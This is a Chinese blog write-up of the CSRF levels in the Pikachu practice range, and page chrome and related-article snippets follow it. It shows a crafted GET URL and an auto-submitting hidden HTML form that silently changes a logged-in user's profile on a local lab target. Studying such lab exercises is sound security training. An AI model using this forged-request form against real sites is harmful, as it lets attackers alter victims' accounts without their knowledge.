pikachu_csrf通关攻略

最新推荐文章于 2024-04-12 01:16:41 发布
最新推荐文章于 2024-04-12 01:16:41 发布
阅读量585 收藏 9
点赞数 7
分类专栏: 网络安全 渗透测试漏洞 文章标签: csrf 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46390077/article/details/135780264
版权

csrf(get)

打开pikachu靶场:

1. 根据提示给的账户密码进行登录

2. 打开代理拦截数据包将拦截数据发送到已打开的burp中: 

修改数据进行发包:

从上面的url可见,修改用户信息的时候,是不带任何不可预测的认证信息的。那么,这里应该是可以被利用的。

回到把常中利用这个信息进行修改账户信息。

3. 在URL地址中构造payload:

127.0.0.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=888888&add=usa&email=11111&submit=submit

4. 攻击成功:

csrf(post)

1. 登录账户

2. 修改信息拦截:

从上图的请求报文来看,和前一关一样,没有不可预测的认证信息,可以被利用。

修改包中信息是可以被修改的,但是这一关是post类型,URL不再显示修改参数,所以无法再使用上述办法(即通过URL来伪造请求)进行修改。

3. 构造攻击表单

此时,可以构造一个表单。将POST请求隐藏在站点中的表单中,然后诱骗用户进行点击,当用户点击后触发表单,数据自然就POST到存在CSRF漏洞的网站,用户的信息则被恶意修改。

<html>
    <script>                                                                                                     
        window.onload = function() {
        document.getElementById("submit").click();
        }
    </script>              
    <body>
            <form action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">    
                <input type="hidden" name="sex" value="boy" />
                <input type="hidden" name="phonenum" value="123456789" />
                <input type="hidden" name="add" value="usa" />
                <input type="hidden" name="email" value="llll" />
                <input type="hidden" name="submit" value="submit" />
              <input id="submit" type="submit" value="Submit request" style="display:none"/>                    <!-- style设置为display:none起到隐藏submit按钮的作用 -->
            </form>
    </body>
</html>

我将构造的表单放到pikachu目录下,当访问这个文件时就触发条件自动修改用户信息。

点击之前:

点击文件之后:

4. 攻击成功

csrf(token)

让我攻略会~

爱吃银鱼焖蛋
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu-CSRF(跨站请求伪造)
a1245678899的博客
11-10 606
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。点击修改个人信息然后使用burpsuite抓包可以看到这个数据的传输过程是get型,数据包含在URL之中直接在URL之中构造包含自己信息的网址,伪造一下,诱导用户去点击。当链接被点击以后,可以看到信息已经被修改。
pikachu靶场中的CSRF、SSRF通关
最新发布
qq_68163788的博客
05-26 1973
Pikachu靶场中,CSRF(Cross-Site Request Forgery)和SSRF(Server-Side Request Forgery)是两种常见的Web安全漏洞。CSRF攻击利用用户在已认证的Web应用程序上执行未经意的操作,通过伪装请求来执行恶意操作,例如更改用户密码或发送资金。而SSRF漏洞则允许攻击者从受害服务器上执行请求,可能导致访问内部系统、绕过防火墙或执行其他恶意操作。
Pikachu靶场:CSRF(GET)、CSRF(POST)以及CSRF(token)
witwitwiter的博客
04-18 3798
Pikachu靶场:CSRF(GET)、CSRF(POST)以及CSRF(token) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 CSRF的主要问题是敏感操作的链接容易被伪造,那么如何让这个链接不
pikachu csrf(get)
ANYOUZHEN的博客
05-04 375
抓包,观察get里面的内容,add表示地址的意思,将地址修改为beijing,然后将url替换get,完成伪装,只要让对方点击改伪造链接,即可达成修改地址的目的
pikachu靶场通关CSRF
Python毕设源码程序王哥
04-12 1677
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu(皮卡丘)--CSRF
m0_74871683的博客
09-16 442
简要概述为1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如:--对敏感信息的操作增加安全的token;--对敏感信息的操作增加安全的验证码;
pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列)
箭雨镜屋
04-14 8171
一、官方介绍 本节引用内容来自pikachu漏洞平台(删了一些内容,留下了最重要的部分,并为精炼语言进行了一些修改) 1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。 2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。 3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如: --对敏感信息的操作增加安全
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
PyPI 官网下载 | gym_pikachu_volleyball-0.0.1.tar.gz
01-12
《PyPI官网下载:探索gym_pikachu_volleyball-0.0.1.tar.gz中的Python库知识》 PyPI(Python Package Index)是Python开发者的重要资源库,它提供了无数的开源Python库,便于开发者们下载和安装。在本文中,我们将...
pikachu靶场通关
11-19
pikachu靶场通关
pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_
10-03
【标题】"pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_" 暗示了这是一个与《名侦探皮卡丘》(Detective Pikachu)相关的资源,可能是一部电影或动画的阿拉伯语版本。"arabic" 表明内容是阿拉伯语...
pikachu~~~CSRF(get,post,token)
weixin_50339832的博客
06-06 1617
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=dv&phonenum=num&add=beijing&email=kobe%40pikachu.com&submit=submit HTTP/1.1
皮卡丘(pikachu)CSRF
weixin_44787832的博客
07-23 2802
CSRF(get) 输入账号密码登录 kobe/123456 点击修改信息 修改信息后点击submit提交按钮并抓包 抓包后将GET这条改动一下 将 GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=123456&add=henan&email=111%40qq.com&submit=submit HTTP/1.1 改为 GET /pikachu/vul/csrf/
pikachu平台之csrf
qq_42728977的博客
12-16 1969
概述 参考链接 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了,所以CSRF攻击也被称为“one click”攻击。 场景例子 lucy想要在购物网站上修改购物地址,这个操作是lucy通过浏览器向后端发送了请求。...
Pikachu(皮卡丘)靶场---CSRF
m0_74850066的博客
06-04 388
你可以这么来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
Pikachu靶场练习——CSRF
young的博客
09-09 2359
Pikachu靶场练习——CSRF
皮卡丘--CSRF
renyizou的博客
06-21 364
csrf--get get型通过url地址传参,只需要设置好url地址的参数,这时,受害者如果在登录账号的情况下,被诱导点击这个链接,那么受害者的信息就被更改为url地址中的信息了 csrf--post post型通过提交post表单进行修改操作,这时我们需要仿造一个post表单。 通过查看前端代码,模防出一个form表单还是不难的。 <html> <head> <meta charset="UTF-8"> </head&gt..
pikachu靶场csrf通关
05-06
Pikachu靶场是一个用于学习网络安全的虚拟...通关Pikachu靶场中的CSRF挑战需要先了解什么是CSRF漏洞,然后通过修改请求参数等手段来伪造请求,实现攻击目标网站。具体的挑战流程可以参考Pikachu靶场中的提示和指引。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值